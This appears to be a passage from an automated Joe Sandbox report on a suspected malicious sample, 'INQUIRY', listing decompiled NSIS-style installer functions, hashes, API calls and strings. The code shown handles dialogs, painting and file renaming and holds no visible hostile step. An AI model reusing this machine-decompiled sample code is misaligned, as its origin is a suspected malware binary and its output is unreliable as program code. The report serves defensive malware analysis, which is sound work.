Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 79a49d33a732b5ea980f3e3ade6f1cc643607616e4a3787014113af3834afba4
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: C2E0863E3506508FC320DA59D990A52F3E9FB8C2B07154869E99AD3711C330FC00CE50

Uniqueness

Uniqueness Score: -1.00%

Function 021A06C7 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00403964 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091bc - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, "heifsmlbdxlebvytfzg Setup");
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421498 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x0040396d
0x00403976
0x00403ab7
0x00403abb
0x00403abf
0x00403ac1
0x00403ac6
0x00403ad1
0x00403adc
0x00403ae1
0x00403ae3
0x00403ae5
0x00403ae8
0x00403aed
0x00403afb
0x00403b08
0x00403b0f
0x00403b0f
0x00403b10
0x00403b10
0x00403b15
0x00403b1b
0x00403b22
0x00403b28
0x00403b2a
0x00403b6a
0x00403b6f
0x00403b74
0x00403b74
0x00403b79
0x00403b82
0x00403b84
0x00403b89
0x00403b8f
0x00403b93
0x00403b93
0x00403b98
0x00403b9e
0x00000000
0x00000000
0x00403ba4
0x00403ba9
0x00403baf
0x00000000
0x00000000
0x00403bb8
0x00403bc0
0x00403bc5
0x00403bc8
0x00403bce
0x00403bd3
0x00403bd6
0x00403bdc
0x00403be1
0x00403be4
0x00403bea
0x00403bf2
0x00403bf8
0x00403bfe
0x00403c02
0x00403c09
0x00403c09
0x00403c09
0x00403c13
0x00403c25
0x00403c31
0x00403c36
0x00403c40
0x00403c46
0x00403c48
0x00403c4d
0x00403c4a
0x00403c4a
0x00403c4a
0x00403c5d
0x00403c75
0x00403c77
0x00403c7d
0x00403c92
0x00403c7f
0x00403c88
0x00403c8a
0x00403c8a
0x00403c98
0x00403ca8
0x00403cb9
0x00403cc0
0x00403cc6
0x00403cca
0x00403ccf
0x00403cd1
0x00000000
0x00403cd7
0x00403cd7
0x00403cd9
0x00000000
0x00000000
0x00403cdf
0x00403ce3
0x00403d08
0x00403d0e
0x00403d14
0x00403d16
0x00000000
0x00000000
0x00403d3c
0x00403d42
0x00403d44
0x00403d49
0x00000000
0x00000000
0x00403d4f
0x00403d52
0x00403d55
0x00403d6c
0x00403d78
0x00403d91
0x00403d97
0x00403d9b
0x00403da0
0x00403da6
0x00000000
0x00000000
0x00403db0
0x00403dbb
0x00000000
0x00403dbb
0x00403ce5
0x00403ceb
0x00000000
0x00000000
0x00403cf1
0x00403cf7
0x00000000
0x00000000
0x00000000
0x00403cfd
0x00403cd1
0x00403dc8
0x00403dd4
0x00403ddb
0x00000000
0x00403b2c
0x00403b2c
0x00403b2f
0x00403b62
0x00403b62
0x00403b64
0x00000000
0x00000000
0x00000000
0x00403b64
0x00403b31
0x00403b35
0x00403b3a
0x00403b3c
0x00000000
0x00000000
0x00403b4c
0x00403b54
0x00000000
0x00403b5a
0x00403988
0x00403988
0x0040398c
0x00403991
0x004039a0
0x004039a0
0x004039a9
0x004039b2
0x004039bd
0x004039bd
0x004039c9
0x004039e5
0x004039e8
0x004039fb
0x00403a01
0x00403aa4
0x00000000
0x00403aad
0x00403a07
0x00403a14
0x00403a16
0x00403a18
0x00403a37
0x00403a37
0x00403a3a
0x00403a3f
0x00403a42
0x00403a52
0x00403a53
0x00403a55
0x00403a8b
0x00403a9e
0x00000000
0x00403a9e
0x00403a57
0x00403a5d
0x00403a76
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00403a7f
0x00403a6b
0x00403a6b
0x00403a6d
0x00403a6d
0x00000000
0x00403a6d
0x00403a60
0x00403a65
0x00000000
0x00403a65
0x00403a44
0x00403a4a
0x00000000
0x00000000
0x00403a4c
0x00000000
0x00403a4c
0x00403a3c
0x00000000
0x00403a3c
0x00403a22
0x00403a29
0x00403a2f
0x00403a31
0x00000000
0x00000000
0x00000000
0x00403a31
0x004039ed
0x00000000
0x004039cb
0x004039d1
0x004039db
0x00403de1
0x00403de7
0x00403de9
0x00403def
0x00403df4
0x00403dfa
0x00403dfa
0x00403def
0x00403e04
0x00000000
0x00403e04
0x004039c9

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32 ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,heifsmlbdxlebvytfzg Setup), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Strings

heifsmlbdxlebvytfzg Setup, xrefs: 00403CA2

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: heifsmlbdxlebvytfzg Setup
API String ID: 184305955-4100266025
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x5233c1
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x521d84
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x51d818
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

0x00403f8f
0x004040b5
0x00404111
0x00404115
0x004041ec
0x004041ee
0x004041ee
0x004041f4
0x004041f4
0x004041f7
0x00000000
0x004041fe
0x00404123
0x00404125
0x0040412f
0x0040413a
0x0040413d
0x00404140
0x0040414b
0x0040414e
0x00404155
0x00404163
0x0040417b
0x00404183
0x0040418e
0x0040419e
0x004041a0
0x004041a0
0x00404155
0x004041aa
0x00000000
0x004041b5
0x004041b9
0x004041ca
0x004041ca
0x004041d0
0x004041de
0x004041de
0x00000000
0x004041e2
0x004041aa
0x004040c0
0x00000000
0x004040d4
0x004040d4
0x004040da
0x004040da
0x004040e0
0x00000000
0x00000000
0x00404105
0x00404107
0x0040410c
0x00000000
0x0040410c
0x004040c0
0x00403f95
0x00403f98
0x00403f9d
0x00403f9f
0x00403fae
0x00403fae
0x00403fb0
0x00403fb5
0x00403fb8
0x00403fba
0x00403fbf
0x00403fc8
0x00403fce
0x00403fda
0x00403fdd
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x0040400a
0x00404011
0x00404024
0x00404027
0x0040403c
0x0040403e
0x00404043
0x00404048
0x0040404d
0x0040404d
0x0040405c
0x0040406b
0x0040406d
0x00404083
0x00404092
0x00404094
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
GetSysColor.USER32(?), ref: 0040404D
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32(00000000), ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE

Strings

N, xrefs: 00404111
@.B, xrefs: 00404183
open, xrefs: 00404186

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x51d818
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "heifsmlbdxlebvytfzg Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x00401019
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
heifsmlbdxlebvytfzg Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$heifsmlbdxlebvytfzg Setup
API String ID: 941294808-3161167016
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t18 =  *0x423eb0; // 0x51d818
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
